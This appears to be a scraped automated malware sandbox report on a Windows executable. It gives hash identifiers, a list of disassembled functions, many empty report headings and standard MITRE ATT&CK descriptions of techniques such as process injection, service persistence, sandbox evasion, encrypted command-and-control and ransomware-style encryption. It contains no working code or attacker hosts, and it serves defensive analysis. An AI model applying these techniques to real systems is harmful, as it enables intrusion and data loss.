Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Temp$FileNamePath
String ID: C:\Windows\SysWOW64\sharedconnect.exe
API String ID: 3285503233-3666525999
Opcode ID: 994aeaf92448a9f72a8b59ff65984b7548391d3ca01d841f3e6d71c7cdb277d3
Instruction ID: 7d4148721fa2c1bf48298a360098c60c33e64c9ab500a48f025fa0c2d829e1b9
Opcode Fuzzy Hash: 994aeaf92448a9f72a8b59ff65984b7548391d3ca01d841f3e6d71c7cdb277d3
Instruction Fuzzy Hash: 00D05B7060013B5BDA2076A55C0C8EF7B6CDB555A1B00019BBA1AC3530DD74898697E1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report tcpmdmaus.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

ICMP Packets

HTTP Request Dependency Graph

Function 003B14C9, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 259
filewindowCOMMON

Function 009518C0, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Function 00951B40, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Function 0095110C, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 46
synchronizationCOMMON

Function 00951258, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Function 00951E71, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Function 00957B40, Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Function 009511F6, Relevance: 3.0, APIs: 2, Instructions: 18
synchronizationCOMMON

Function 00951B57, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Function 00951B86, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Function 00951850, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Function 00951B78, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Function 003C4285, Relevance: 1.4, APIs: 1, Instructions: 103
memoryCOMMON

Function 00951966, Relevance: 3.1, APIs: 2, Instructions: 53
libraryloaderCOMMON

Function 009515E0, Relevance: .0, Instructions: 19
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre